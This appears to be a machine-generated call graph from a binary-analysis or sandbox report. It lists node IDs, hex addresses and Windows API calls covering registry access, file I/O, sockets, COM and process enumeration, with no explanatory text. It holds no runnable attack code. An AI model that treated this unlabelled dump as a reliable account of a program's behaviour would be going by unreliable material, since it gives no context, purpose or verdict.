107804 ebef3e 107802->107804 107806 ec010a 48 API calls 107803->107806 109073 ebf0f3 48 API calls 107804->109073 107807 ebf002 107806->107807 107808 ebf00e 107807->107808 109075 ea5080 49 API calls 107807->109075 107810 ea84a6 81 API calls 107808->107810 107815 ebf01c 107810->107815 107811 ebef73 107816 ebf03e 2 API calls 107811->107816 107812 ebef4d 107812->107811 107813 f16942 107812->107813 107814 eacdb4 48 API calls 107812->107814 107813->107614 107817 f16965 107814->107817 107818 ea4bf9 56 API calls 107815->107818 107819 ebef7a 107816->107819 107817->107811 107820 f1696d 107817->107820 107821 ebf02b 107818->107821 107822 f16980 107819->107822 107823 ebef87 107819->107823 107824 eacdb4 48 API calls 107820->107824 107821->107812 107825 f16936 107821->107825 107826 ec010a 48 API calls 107822->107826 107827 ead3d2 48 API calls 107823->107827 107824->107819 107825->107813 109076 ea4592 CloseHandle 107825->109076 107828 f16986 107826->107828 107829 ebef8f 107827->107829 107830 f1699f 107828->107830 109077 ea3d65 ReadFile SetFilePointerEx 107828->109077 109050 ebf04e 107829->109050 107837 f169a3 _memmove 107830->107837 109078 eead14 48 API calls _memset 107830->109078 107835 ebef9e 107836 ea7bef 48 API calls 107835->107836 107835->107837 107838 ebefb2 Mailbox 107836->107838 107839 ebeff2 107838->107839 107840 ea50ec CloseHandle 107838->107840 107839->107614 107841 ebefe4 107840->107841 109074 ea4592 CloseHandle 107841->109074 109121 ea19ee 107843->109121 107847 f079a4 107847->107614 107849 eaca8e 48 API calls 107848->107849 107850 f030ca 107849->107850 107851 ead3d2 48 API calls 107850->107851 107852 f030d3 107851->107852 107853 ead3d2 48 API calls 107852->107853 107854 f030dc 107853->107854 107855 ead3d2 48 API calls 107854->107855 107856 f030e5 107855->107856 107857 ea84a6 81 API calls 107856->107857 107858 f030f4 107857->107858 107859 f03d7b 48 API calls 107858->107859 107860 f03128 107859->107860 107861 f03af7 49 API calls 107860->107861 107862 f03159 107861->107862 107863 f0319c RegOpenKeyExW 107862->107863 107864 f03172 RegConnectRegistryW 107862->107864 107873 f0315d Mailbox 107862->107873 107866 f031c5 107863->107866 107867 f031f7 107863->107867 107864->107863 107864->107873 107870 f031d9 RegCloseKey 107866->107870 107866->107873 107868 ea84a6 81 API calls 107867->107868 107869 f03207 RegQueryValueExW 107868->107869 107871 f03229 107869->107871 107872 f0323e 107869->107872 107870->107873 107877 f034eb RegCloseKey 107871->107877 107872->107871 107874 f03265 107872->107874 107875 f0344c 107872->107875 107873->107614 107878 f033d9 107874->107878 107879 f0326e 107874->107879 107876 ec010a 48 API calls 107875->107876 107880 f03464 107876->107880 107877->107873 107881 f034fe RegCloseKey 107877->107881 109245 eead14 48 API calls _memset 107878->109245 107883 f03279 107879->107883 107884 f0338d 107879->107884 107885 ea84a6 81 API calls 107880->107885 107881->107873 107887 f032de 107883->107887 107888 f0327e 107883->107888 107889 ea84a6 81 API calls 107884->107889 107892 f03479 RegQueryValueExW 107885->107892 107886 f033e4 107893 ea84a6 81 API calls 107886->107893 107891 ec010a 48 API calls 107887->107891 107888->107871 107896 ea84a6 81 API calls 107888->107896 107890 f033a1 RegQueryValueExW 107889->107890 107890->107871 107894 f032f7 107891->107894 107892->107871 107901 f03331 107892->107901 107895 f033f6 RegQueryValueExW 107893->107895 107897 ea84a6 81 API calls 107894->107897 107895->107871 107895->107877 107898 f0329f RegQueryValueExW 107896->107898 107899 f0330c RegQueryValueExW 107897->107899 107898->107871 107899->107871 107899->107901 107900 eaca8e 48 API calls 107900->107871 107901->107900 107903 ea84a6 81 API calls 107902->107903 107904 f010fb LoadLibraryW 107903->107904 107905 f0111e 107904->107905 107906 f0110f 107904->107906 107905->107906 109246 f028d9 48 API calls _memmove 107905->109246 107906->107614 107909 ea19ee 83 API calls 107908->107909 107910 f08062 107909->107910 107911 ea1dce 107 API calls 107910->107911 107912 f0806b 107911->107912 107913 f08091 107912->107913 107914 f0806f 107912->107914 107915 ead3d2 48 API calls 107913->107915 107916 eaca8e 48 API calls 107914->107916 107917 f0809a 107915->107917 107921 f0808f Mailbox 107916->107921 109247 ede2e8 107917->109247 107919 f080aa 107920 ea7bef 48 API calls 107919->107920 107920->107921 107921->107614 107923 eaca8e 48 API calls 107922->107923 107924 efb7a3 CoInitialize 107923->107924 107925 efb7ae CoUninitialize 107924->107925 107926 efb7b4 107924->107926 107925->107926 107927 efb7d5 107926->107927 107929 eaca8e 48 API calls 107926->107929 107928 efb81b 107927->107928 107930 ea84a6 81 API calls 107927->107930 107931 ea84a6 81 API calls 107928->107931 107929->107927 107932 efb7ef 107930->107932 107933 efb827 107931->107933 109272 eda857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 107932->109272 107937 efb9d3 SetErrorMode CoGetInstanceFromFile 107933->107937 107947 efb861 107933->107947 107935 efb802 107935->107928 107936 efb807 107935->107936 109273 efc235 417 API calls Mailbox 107936->109273 107938 efba1f CoGetObject 107937->107938 107939 efba19 SetErrorMode 107937->107939 107938->107939 107943 efbaa8 107938->107943 107960 efb9b1 107939->107960 107941 efb8a8 GetRunningObjectTable 107944 efb8b8 107941->107944 107945 efb8cb 107941->107945 109278 efc235 417 API calls Mailbox 107943->109278 107944->107945 107961 efb8ed 107944->107961 109274 efc235 417 API calls Mailbox 107945->109274 107947->107941 107951 efb89a 107947->107951 107954 eacdb4 48 API calls 107947->107954 107949 efbad0 VariantClear 107949->107614 107950 efb814 Mailbox 107950->107949 107951->107941 107952 efbac2 SetErrorMode 107952->107950 107953 efba53 107955 efba6f 107953->107955 109276 edac4b 51 API calls Mailbox 107953->109276 107957 efb88a 107954->107957 109277 eea6f6 103 API calls 107955->109277 107957->107951 107959 eacdb4 48 API calls 107957->107959 107959->107951 107960->107943 107960->107953 107961->107960 109275 edac4b 51 API calls Mailbox 107961->109275 109279 f023c5 107963->109279 107967 eaa6d4 48 API calls 107966->107967 107968 ef92d2 107967->107968 107969 ea84a6 81 API calls 107968->107969 107970 ef92e1 107969->107970 107971 ebf26b 50 API calls 107970->107971 107972 ef92ed gethostbyname 107971->107972 107973 ef931d _memmove 107972->107973 107974 ef92fa WSAGetLastError 107972->107974 107976 ef932d inet_ntoa 107973->107976 107975 ef930e 107974->107975 107977 eaca8e 48 API calls 107975->107977 109363 efadca 48 API calls 2 library calls 107976->109363 107983 ef931b Mailbox 107977->107983 107979 ef9342 109364 efae5a 50 API calls 107979->109364 107981 ef934e 107982 ea7bef 48 API calls 107981->107982 107982->107983 107983->107614 107985 ec010a 48 API calls 107984->107985 107986 ea50b3 107985->107986 107987 ea50ec CloseHandle 107986->107987 107988 ea50be 107987->107988 107988->107614 109365 ef6b19 107989->109365 107992 ef80a5 107993 ea3320 48 API calls 107992->107993 107994 ef80b3 107993->107994 109370 eb2320 50 API calls 107994->109370 107995 ef8102 107997 eacdb4 48 API calls 107995->107997 108002 ef80f5 107995->108002 107999 ef812b 107997->107999 107998 ef80cf 109371 eb2320 50 API calls 107998->109371 108001 eacdb4 48 API calls 107999->108001 107999->108002 108001->108002 108002->107614 108004 ebf47f 108003->108004 108005 ebf48a 108003->108005 108006 eacdb4 48 API calls 108004->108006 108007 ebf498 Mailbox 108005->108007 108010 ea84a6 81 API calls 108005->108010 108006->108005 108008 ec010a 48 API calls 108007->108008 108040 ebf50a Mailbox 108007->108040 108009 ebf49f 108008->108009 108011 ebf4af 108009->108011 109372 ea5080 49 API calls 108009->109372 108012 f16841 108010->108012 108015 ea84a6 81 API calls 108011->108015 108014 ec297d __wsplitpath 47 API calls 108012->108014 108016 f16859 108014->108016 108017 ebf4bf 108015->108017 108018 eacaee 48 API calls 108016->108018 108019 ea4bf9 56 API calls 108017->108019 108020 f1686a 108018->108020 108021 ebf4ce 108019->108021 109373 ea39e8 48 API calls 2 library calls 108020->109373 108023 f168d4 GetLastError 108021->108023 108026 ebf4d6 108021->108026 108025 f168ed 108023->108025 108024 f16878 108039 f16895 108024->108039 109374 ee6f4b GetFileAttributesW FindFirstFileW FindClose 108024->109374 108025->108026 109375 ea4592 CloseHandle 108025->109375 108029 f16920 108026->108029 108030 ebf4f0 108026->108030 108028 eacdb4 48 API calls 108028->108007 108032 ec010a 48 API calls 108029->108032 108031 ec010a 48 API calls 108030->108031 108036 ebf4f5 108031->108036 108033 f16925 108032->108033 108034 f16888 108037 ee6d6d 52 API calls 108034->108037 108034->108039 108038 ea197e 48 API calls 108036->108038 108037->108039 108038->108040 108039->108028 108040->107614 108042 ea84a6 81 API calls 108041->108042 108043 ef913f 108042->108043 108044 eacdb4 48 API calls 108043->108044 108045 ef9149 108044->108045 109376 efacd3 108045->109376 108047 ef9156 108048 ef915a socket 108047->108048 108053 ef9182 108047->108053 108049 ef916d WSAGetLastError 108048->108049 108050 ef9184 connect 108048->108050 108049->108053 108051 ef91a3 WSAGetLastError 108050->108051 108050->108053 109382 eed7e4 108051->109382 108053->107614 108054 ef91b8 closesocket 108054->108053 109397 eff79f 108055->109397 108057 f00c0a 108057->107614 109472 ebdd92 GetFileAttributesW 108058->109472 108062 ebf0b5 2 API calls 108061->108062 108063 ebf046 108062->108063 108063->107614 108065 ef015e 108064->108065 108066 ef0157 108064->108066 108067 ea84a6 81 API calls 108065->108067 108068 ea84a6 81 API calls 108066->108068 108067->108066 108069 ef017c 108068->108069 109477 ee76db GetFileVersionInfoSizeW 108069->109477 108071 ef018d 108072 ef0192 108071->108072 108074 ef01a3 _wcscmp 108071->108074 108073 eaca8e 48 API calls 108072->108073 108076 ef01a1 108073->108076 108075 eaca8e 48 API calls 108074->108075 108075->108076 108076->107614 108078 ea84a6 81 API calls 108077->108078 108079 f017c7 108078->108079 108080 ee6f5b 63 API calls 108079->108080 108081 f017d8 108080->108081 108081->107614 108082->107614 108083->107614 108084->107614 108085->107614 108086->107614 108087->107613 108088->107606 108089->107587 108090->107586 108091->107592 108092->107600 108094 ead3d2 48 API calls 108093->108094 108095 eff389 Mailbox 108094->108095 108096 eff3cd 108095->108096 108097 eff3e1 108095->108097 108113 eff3a9 108095->108113 108099 ea7e53 48 API calls 108096->108099 108100 eac935 48 API calls 108097->108100 108098 ead89e 50 API calls 108103 eff421 Mailbox 108098->108103 108101 eff3df 108099->108101 108100->108101 108102 eff429 108101->108102 108231 efcdb5 417 API calls 108101->108231 108225 efcd12 108102->108225 108103->107716 108106 eff410 108106->108102 108108 eff414 108106->108108 108107 eff44b 108110 eff457 108107->108110 108111 eff4a2 108107->108111 108232 eed338 86 API calls 4 library calls 108108->108232 108110->108113 108114 eff476 108110->108114 108112 eff34f 417 API calls 108111->108112 108112->108103 108113->108098 108115 eaca8e 48 API calls 108114->108115 108115->108103 108116->107718 108117->107751 108118->107751 108119->107717 108120->107751 108121->107719 108122->107717 108123->107717 108124->107732 108125->107767 108127 eb469f 108126->108127 108128 eb4537 108126->108128 108131 eacaee 48 API calls 108127->108131 108129 f17820 108128->108129 108130 eb4543 108128->108130 108469 efe713 417 API calls Mailbox 108129->108469 108297 eb4040 108130->108297 108138 eb45e4 Mailbox 108131->108138 108134 eb4639 Mailbox 108134->107716 108135 f1782c 108135->108134 108470 eed520 86 API calls 4 library calls 108135->108470 108137 eb4559 108137->108134 108137->108135 108137->108138 108144 f01f19 132 API calls 108138->108144 108312 ef1080 108138->108312 108315 ef6fc3 108138->108315 108318 ef95af WSAStartup 108138->108318 108320 eedce9 108138->108320 108325 ea50ec 108138->108325 108329 f0352a 108138->108329 108417 eeefcd 108138->108417 108451 ef9500 108138->108451 108460 ebf55e 108138->108460 108144->108134 108149->107759 108150->107766 108151->107770 109007 eaa9a0 108152->109007 108154 eb36e7 108155 eb3778 108154->108155 108156 f1a269 108154->108156 108212 eb3aa8 108154->108212 109019 ebbc04 86 API calls 108155->109019 109024 eed520 86 API calls 4 library calls 108156->109024 108161 f1a3e9 109029 eed520 86 API calls 4 library calls 108161->109029 108162 eb3793 108162->108212 108214 eb396b Mailbox _memmove 108162->108214 108216 f1a68d 108162->108216 109012 ea10e8 108162->109012 108166 f1a583 108169 eafa40 417 API calls 108166->108169 108167 f1a45c 109033 eed520 86 API calls 4 library calls 108167->109033 108168 f1a289 108168->108161 108170 ead2d2 53 API calls 108168->108170 108172 f1a5b5 108169->108172 108173 f1a2fb 108170->108173 108182 ead380 55 API calls 108172->108182 108172->108212 108176 f1a303 108173->108176 108177 f1a40f 108173->108177 108174 eb384e 108179 f1a60c 108174->108179 108180 eb38e5 108174->108180 108174->108214 108190 f1a317 108176->108190 108198 f1a341 108176->108198 109030 ebcf79 49 API calls 108177->109030 109038 eed231 50 API calls 108179->109038 108185 ec010a 48 API calls 108180->108185 108186 f1a5e6 108182->108186 109037 eed520 86 API calls 4 library calls 108186->109037 108187 eafa40 417 API calls 108187->108214 108189 f1a42c 109025 eed520 86 API calls 4 library calls 108190->109025 108191 ebbc5c 48 API calls 108191->108214 108199 f1a366 108198->108199 108203 f1a384 108198->108203 108200 ead89e 50 API calls 108200->108214 108208 eb399f 108209 eac935 48 API calls 108208->108209 108210 eb39c0 108208->108210 108209->108210 108210->108212 108215 f1a65e 108210->108215 108218 eb3a05 108210->108218 108211 ec010a 48 API calls 108211->108214 108221 eb3ab5 Mailbox 108212->108221 109023 eed520 86 API calls 4 library calls 108212->109023 108214->108166 108214->108167 108214->108168 108214->108186 108214->108187 108214->108191 108214->108200 108214->108208 108214->108211 108214->108212 109020 ead500 53 API calls __cinit 108214->109020 109021 ead420 53 API calls 108214->109021 109022 ebbaef 48 API calls _memmove 108214->109022 109034 efd21a 82 API calls Mailbox 108214->109034 109035 ee89e0 53 API calls 108214->109035 109036 ead772 55 API calls 108214->109036 108217 ead89e 50 API calls 108215->108217 108216->108212 109039 eed520 86 API calls 4 library calls 108216->109039 108217->108216 108218->108212 108218->108216 108219 eb3a95 108218->108219 108220 ead89e 50 API calls 108219->108220 108220->108212 108221->107716 108222->107716 108223->107742 108224->107746 108226 efcd46 108225->108226 108227 efcd21 108225->108227 108226->108107 108228 eaca8e 48 API calls 108227->108228 108229 efcd2d 108228->108229 108233 efc8b7 108229->108233 108231->108106 108232->108103 108235 efc914 108233->108235 108236 efc8f7 108233->108236 108291 efc235 417 API calls Mailbox 108235->108291 108236->108235 108237 efcc61 108236->108237 108238 efc934 108236->108238 108239 efcc6e 108237->108239 108240 efcca9 108237->108240 108238->108235 108269 edabf3 108238->108269 108287 ebd6b4 48 API calls 108239->108287 108240->108235 108243 efccb6 108240->108243 108242 efc964 108242->108235 108244 efc973 108242->108244 108289 ebd6b4 48 API calls 108243->108289 108252 efc9a1 108244->108252 108273 eda8c8 108244->108273 108246 efcc87 108288 ee97b6 89 API calls 108246->108288 108250 efccd6 108290 ee503c 91 API calls Mailbox 108250->108290 108256 efca4a 108252->108256 108283 eda25b 106 API calls 108252->108283 108253 efcadc VariantInit 108259 efcb11 _memset 108253->108259 108256->108253 108257 efca86 VariantClear 108256->108257 108257->108256 108258 efcaa5 SysAllocString 108257->108258 108258->108256 108260 efcb8e 108259->108260 108261 efcbb4 108259->108261 108284 efc235 417 API calls Mailbox 108260->108284 108285 eea6f6 103 API calls 108261->108285 108264 efcbad 108266 efcc52 108266->108226 108267 efcbce 108270 edac04 __NMSG_WRITE 108269->108270 108272 edac16 108269->108272 108270->108272 108292 ea3bcf 108270->108292 108272->108242 108275 eda8f2 108273->108275 108274 eda9ed SysFreeString 108282 eda9f9 108274->108282 108275->108274 108276 eda90a 108275->108276 108277 edaa7e 108275->108277 108275->108282 108276->108252 108277->108276 108278 edaad9 SysFreeString 108277->108278 108279 edaac9 lstrcmpiW 108277->108279 108277->108282 108278->108277 108279->108278 108281 edaafa SysFreeString 108279->108281 108281->108282 108282->108276 108296 eda78a RaiseException 108282->108296 108283->108252 108284->108264 108285->108267 108287->108246 108288->108266 108289->108250 108290->108266 108291->108266 108293 ea3bd9 __NMSG_WRITE 108292->108293 108294 ec010a 48 API calls 108293->108294 108295 ea3bee _wcscpy 108294->108295 108295->108272 108296->108282 108298 f1787b 108297->108298 108301 eb406c 108297->108301 108472 eed520 86 API calls 4 library calls 108298->108472 108300 f1788c 108473 eed520 86 API calls 4 library calls 108300->108473 108301->108300 108309 eb40a6 _memmove 108301->108309 108303 eb4175 108308 eb4185 108303->108308 108471 efd21a 82 API calls Mailbox 108303->108471 108304 ec010a 48 API calls 108304->108309 108306 eb41f1 108306->108137 108307 eafa40 417 API calls 108307->108309 108308->108137 108309->108303 108309->108304 108309->108307 108309->108308 108310 f178d8 108309->108310 108474 eed520 86 API calls 4 library calls 108310->108474 108475 ef22e5 108312->108475 108314 ef1090 108314->108134 108316 ea84a6 81 API calls 108315->108316 108317 ef6fd6 SetWindowTextW 108316->108317 108317->108134 108319 ef95e0 108318->108319 108319->108134 108321 ea84a6 81 API calls 108320->108321 108322 eedcfc 108321->108322 108662 ee6d6d 108322->108662 108324 eedd06 108324->108134 108326 ea50f6 108325->108326 108327 ea5105 108325->108327 108326->108134 108327->108326 108328 ea510a CloseHandle 108327->108328 108328->108326 108330 ead3d2 48 API calls 108329->108330 108331 f0354a 108330->108331 108332 ead3d2 48 API calls 108331->108332 108333 f03553 108332->108333 108334 ead3d2 48 API calls 108333->108334 108335 f0355c 108334->108335 108336 ea84a6 81 API calls 108335->108336 108341 f035e9 Mailbox 108335->108341 108337 f03580 108336->108337 108674 f03d7b 108337->108674 108341->108134 108418 ea84a6 81 API calls 108417->108418 108419 eeeff2 108418->108419 108748 ee78ad GetFullPathNameW 108419->108748 108424 eef04b CoInitialize CoCreateInstance 108426 eef08e 108424->108426 108427 eef070 108424->108427 108428 ea84a6 81 API calls 108426->108428 108429 eef07a CoUninitialize 108427->108429 108430 eef09d 108428->108430 108449 eef23c Mailbox 108429->108449 108449->108134 108452 eacdb4 48 API calls 108451->108452 108453 ef9515 108452->108453 108454 eebe47 50 API calls 108453->108454 108455 ef9522 108454->108455 108456 ef952f send 108455->108456 108457 ef9546 108456->108457 108458 ef9552 WSAGetLastError 108457->108458 108459 ef956a 108457->108459 108458->108459 108459->108134 108461 eacdb4 48 API calls 108460->108461 108462 ebf572 108461->108462 108463 f175d1 Sleep 108462->108463 108464 ebf57a timeGetTime 108462->108464 108465 eacdb4 48 API calls 108464->108465 108466 ebf590 108465->108466 108764 eae1f0 108466->108764 108469->108135 108470->108134 108471->108306 108472->108300 108473->108308 108474->108308 108476 ef2306 108475->108476 108477 ef230a 108476->108477 108478 ef2365 108476->108478 108479 ec010a 48 API calls 108477->108479 108544 ebf0f3 48 API calls 108478->108544 108481 ef2311 108479->108481 108482 ef231f 108481->108482 108531 ea5080 49 API calls 108481->108531 108484 ea84a6 81 API calls 108482->108484 108486 ef2331 108484->108486 108485 ef234d 108485->108314 108532 ea4bf9 108486->108532 108488 ef243f 108547 eebe47 108488->108547 108489 ef2379 108489->108485 108489->108488 108492 ef23bb 108489->108492 108495 ea84a6 81 API calls 108492->108495 108493 ef2446 108551 ee689f SetFilePointerEx SetFilePointerEx WriteFile 108493->108551 108501 ef23c2 108495->108501 108497 ef23f6 108513 ee67dc 108497->108513 108500 ef2400 108545 ea7b6e 48 API calls 108500->108545 108501->108497 108501->108500 108503 ef2410 108504 eac935 48 API calls 108503->108504 108505 ef241a 108504->108505 108546 ea39e8 48 API calls 2 library calls 108505->108546 108506 ef23fe Mailbox 108506->108485 108508 ea50ec CloseHandle 108506->108508 108511 ef2490 108508->108511 108514 ee67ec 108513->108514 108515 ee67f6 108513->108515 108569 ee6917 SetFilePointerEx SetFilePointerEx WriteFile 108514->108569 108517 ee67fc 108515->108517 108518 ee6808 108515->108518 108570 ee68b9 51 API calls 108517->108570 108519 ee6824 108518->108519 108520 ee6811 108518->108520 108530 ee67f4 Mailbox 108530->108506 108531->108482 108533 ea50ec CloseHandle 108532->108533 108534 ea4c04 108533->108534 108607 ea4b88 108534->108607 108544->108489 108545->108503 108548 eebe55 108547->108548 108549 eebe50 108547->108549 108548->108493 108661 eeae06 50 API calls 2 library calls 108549->108661 108551->108506 108569->108530 108570->108530 108608 f14957 108607->108608 108609 ea4ba1 CreateFileW 108607->108609 108610 f1495d CreateFileW 108608->108610 108612 ea4bc3 108608->108612 108609->108612 108610->108612 108661->108548 108663 ee6d8a __NMSG_WRITE 108662->108663 108664 ee6db3 GetFileAttributesW 108663->108664 108665 ee6dc5 GetLastError 108664->108665 108666 ee6de3 108664->108666 108667 ee6de7 108665->108667 108668 ee6dd0 CreateDirectoryW 108665->108668 108666->108324 108667->108666 108669 ea3bcf 48 API calls 108667->108669 108668->108666 108668->108667 108670 ee6df7 _wcsrchr 108669->108670 108670->108666 108671 ee6d6d 48 API calls 108670->108671 108672 ee6e1b 108671->108672 108672->108666 108673 ee6e28 CreateDirectoryW 108672->108673 108673->108666 108675 eac4cd 48 API calls 108674->108675 108676 f03d89 108675->108676 108677 eac4cd 48 API calls 108676->108677 108678 f03d91 108677->108678 108679 eac4cd 48 API calls 108678->108679 108749 ea7e53 48 API calls 108748->108749 108750 ee78df 108749->108750 108751 ebe617 48 API calls 108750->108751 108752 ee78eb 108751->108752 108753 ef267a 108752->108753 108754 ef26a4 __NMSG_WRITE 108753->108754 108755 eef039 108754->108755 108756 ef26d8 108754->108756 108759 ef2763 108754->108759 108755->108424 108760 ea39e8 48 API calls 2 library calls 108755->108760 108756->108755 108762 ebdfd2 60 API calls 108756->108762 108759->108755 108763 ebdfd2 60 API calls 108759->108763 108760->108424 108762->108756 108763->108759 108765 eae216 108764->108765 108824 eae226 Mailbox 108764->108824 108766 eae670 108765->108766 108765->108824 108894 ebecee 417 API calls 108766->108894 108768 eae4fd 108768->108134 108770 eae681 108770->108768 108772 eae68e 108770->108772 108771 eae26c PeekMessageW 108771->108824 108896 ebec33 417 API calls Mailbox 108772->108896 108774 eae695 LockWindowUpdate DestroyWindow GetMessageW 108774->108768 108775 f15b13 Sleep 108775->108824 108778 eae4e7 108778->108768 108895 ea322e 16 API calls 108778->108895 108781 ebcf79 49 API calls 108781->108824 108783 eae657 PeekMessageW 108783->108824 108784 eae517 timeGetTime 108784->108824 108786 ec010a 48 API calls 108786->108824 108787 eac935 48 API calls 108787->108824 108788 eae641 TranslateMessage DispatchMessageW 108788->108783 108789 f15dfc WaitForSingleObject 108792 f15e19 GetExitCodeProcess CloseHandle 108789->108792 108789->108824 108790 ead3d2 48 API calls 108820 f15cce Mailbox 108790->108820 108791 f16147 Sleep 108791->108820 108792->108824 108793 eae6cc timeGetTime 108897 ebcf79 49 API calls 108793->108897 108797 f15feb Sleep 108797->108824 108799 f161de GetExitCodeProcess 108802 f161f4 WaitForSingleObject 108799->108802 108803 f1620a CloseHandle 108799->108803 108802->108803 108802->108824 108803->108820 108804 f15cea Sleep 108804->108824 108805 f08a48 108 API calls 108805->108820 108806 ea1dce 107 API calls 108806->108824 108808 f15cd7 Sleep 108808->108804 108809 f16266 Sleep 108809->108824 108811 eacaee 48 API calls 108811->108820 108814 eafa40 393 API calls 108814->108824 108815 ead380 55 API calls 108815->108820 108816 eb44e0 393 API calls 108816->108824 108817 eb3680 393 API calls 108817->108824 108819 eacaee 48 API calls 108819->108824 108820->108790 108820->108799 108820->108804 108820->108805 108820->108808 108820->108809 108820->108811 108820->108815 108820->108824 108899 ee56dc 49 API calls Mailbox 108820->108899 108900 ebcf79 49 API calls 108820->108900 108901 ea1000 417 API calls 108820->108901 108903 efd12a 50 API calls 108820->108903 108904 ee8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108820->108904 108905 ebe3a5 timeGetTime 108820->108905 108906 ee6f5b CreateToolhelp32Snapshot Process32FirstW 108820->108906 108821 eed520 86 API calls 108821->108824 108823 ead380 55 API calls 108823->108824 108824->108771 108824->108775 108824->108778 108824->108781 108824->108783 108824->108784 108824->108786 108824->108787 108824->108788 108824->108789 108824->108791 108824->108793 108824->108797 108824->108804 108824->108806 108824->108814 108824->108816 108824->108817 108824->108819 108824->108820 108824->108821 108824->108823 108825 ea1000 393 API calls 108824->108825 108826 eae7e0 108824->108826 108833 eaea00 108824->108833 108883 ebf381 108824->108883 108888 ebed1a 108824->108888 108893 eae7b0 417 API calls Mailbox 108824->108893 108898 f08b20 48 API calls 108824->108898 108902 ebe3a5 timeGetTime 108824->108902 108825->108824 108827 eae80f 108826->108827 108828 eae7fd 108826->108828 108944 eed520 86 API calls 4 library calls 108827->108944 108913 eadcd0 108828->108913 108832 f198e8 108832->108832 108834 eaea20 108833->108834 108835 eafa40 417 API calls 108834->108835 108838 eaea89 108834->108838 108836 f19919 108835->108836 108836->108838 108952 eed520 86 API calls 4 library calls 108836->108952 108837 f199bc 108955 eed520 86 API calls 4 library calls 108837->108955 108842 ead3d2 48 API calls 108838->108842 108863 eaeb18 108838->108863 108868 eaecd7 Mailbox 108838->108868 108841 ead3d2 48 API calls 108843 f19997 108841->108843 108844 f19963 108842->108844 108953 ec1b2a 52 API calls __cinit 108844->108953 108847 f19d70 108964 efe2fb 417 API calls Mailbox 108847->108964 108849 ead380 55 API calls 108849->108868 108850 f19dc2 108966 eed520 86 API calls 4 library calls 108850->108966 108851 f19ddf 108967 efc235 417 API calls Mailbox 108851->108967 108853 eafa40 417 API calls 108853->108868 108854 f19e49 108969 eed520 86 API calls 4 library calls 108854->108969 108856 ea342c 48 API calls 108856->108868 108858 eb14a0 48 API calls 108858->108868 108863->108841 108863->108868 108865 eaf56f 108882 eaef0c Mailbox 108865->108882 108965 eed520 86 API calls 4 library calls 108865->108965 108867 ead805 48 API calls 108867->108868 108868->108837 108868->108847 108868->108849 108868->108850 108868->108851 108868->108853 108868->108854 108868->108856 108868->108858 108868->108865 108868->108867 108869 eed520 86 API calls 108868->108869 108870 f19a3c 108868->108870 108868->108882 108956 eea3ee 48 API calls 108868->108956 108957 efede9 417 API calls 108868->108957 108962 eda599 InterlockedDecrement 108868->108962 108963 eff4df 417 API calls 108868->108963 108869->108868 108958 efd154 48 API calls 108870->108958 108882->108824 108884 ebf390 108883->108884 108886 f1ee11 108883->108886 108884->108824 108885 f1ee46 108886->108885 108887 f1ee28 TranslateAcceleratorW 108886->108887 108887->108884 108889 ebed2c 108888->108889 108890 ebed34 108888->108890 108889->108824 108890->108889 108891 ebed5e IsDialogMessageW 108890->108891 108892 f1ebec GetClassLongW 108890->108892 108891->108889 108891->108890 108892->108890 108892->108891 108893->108824 108894->108778 108895->108770 108896->108774 108897->108824 108898->108824 108899->108820 108900->108820 108901->108820 108902->108824 108903->108820 108904->108820 108905->108820 108970 ee79c2 108906->108970 108910 ee6fa0 _wcscat 108914 eafa40 417 API calls 108913->108914 108915 eadd0f _memmove 108914->108915 108916 eae12b Mailbox 108915->108916 108919 eadd70 108915->108919 108920 ec010a 48 API calls 108915->108920 108927 f18dbe 108915->108927 108928 eadeb7 108915->108928 108939 eadf29 108915->108939 108920->108915 108921 eae051 108928->108916 108930 eadec4 108928->108930 108932 f18d9e 108937 eadf64 108939->108921 108939->108932 108939->108937 108940 f18d76 108939->108940 108942 f18d51 108939->108942 108946 ea5322 417 API calls 108939->108946 108944->108832 108946->108939 108952->108838 108953->108863 108955->108882 108956->108868 108957->108868 108962->108868 108963->108868 108964->108865 108965->108882 108966->108882 108969->108882 108971 ee79e9 108970->108971 108972 ee79d0 108970->108972 108980 ec224a 58 API calls __wcstoi64 108971->108980 108972->108971 108975 ee79ef 108972->108975 108979 ec22df GetStringTypeW __towlower_l 108972->108979 108975->108910 108979->108972 108980->108975 109008 eaa9af 109007->109008 109011 eaa9ca 109007->109011 109009 eab8a7 48 API calls 109008->109009 109010 eaa9b7 CharUpperBuffW 109009->109010 109010->109011 109011->108154 109013 ea10f9 109012->109013 109014 f14c5a 109012->109014 109015 ec010a 48 API calls 109013->109015 109016 ea1100 109015->109016 109017 ea1121 109016->109017 109040 ea113c 48 API calls 109016->109040 109017->108174 109019->108162 109020->108214 109021->108214 109022->108214 109023->108221 109024->108162 109025->108212 109029->108212 109030->108189 109033->108212 109034->108214 109035->108214 109036->108214 109037->108212 109038->108208 109039->108212 109040->109017 109041->107795 109042->107797 109044 ea7c3a 109043->109044 109045 ea7bfb 109043->109045 109046 eac935 48 API calls 109044->109046 109047 ec010a 48 API calls 109045->109047 109048 ea7c0e 109046->109048 109047->109048 109048->107799 109049->107799 109051 ebf069 109050->109051 109052 ebf057 109050->109052 109055 eac4cd 48 API calls 109051->109055 109053 ebf05d 109052->109053 109054 ebf063 109052->109054 109057 eaa6d4 48 API calls 109053->109057 109056 eaa6d4 48 API calls 109054->109056 109065 ee64f5 109055->109065 109058 ee668b 109056->109058 109059 ebf081 109057->109059 109060 ea4c4f 50 API calls 109058->109060 109079 ea4c4f 109059->109079 109064 ee6699 109060->109064 109063 ee6524 109063->107835 109072 ee66a9 Mailbox 109064->109072 109106 ee6765 50 API calls 109064->109106 109065->109063 109104 ee649b ReadFile SetFilePointerEx 109065->109104 109105 eabd2f 48 API calls _memmove 109065->109105 109067 f149b2 109071 ebf0a3 Mailbox 109071->107835 109072->107835 109073->107812 109074->107839 109075->107808 109076->107813 109077->107830 109078->107837 109080 ebf324 48 API calls 109079->109080 109083 ea4c60 109080->109083 109081 ea4c95 109081->109067 109085 eac610 MultiByteToWideChar 109081->109085 109082 ea4ca0 2 API calls 109082->109083 109083->109081 109083->109082 109107 ea4d29 109083->109107 109086 eac638 109085->109086 109087 f124df 109085->109087 109089 ec010a 48 API calls 109086->109089 109088 eac4cd 48 API calls 109087->109088 109090 f124e7 109088->109090 109091 eac64f MultiByteToWideChar 109089->109091 109097 eaa6f8 48 API calls 109090->109097 109092 eac66c 109091->109092 109093 eac6b7 109091->109093 109092->109093 109095 eac675 109092->109095 109094 eaa2fb 48 API calls 109093->109094 109096 eac6c3 109094->109096 109095->109090 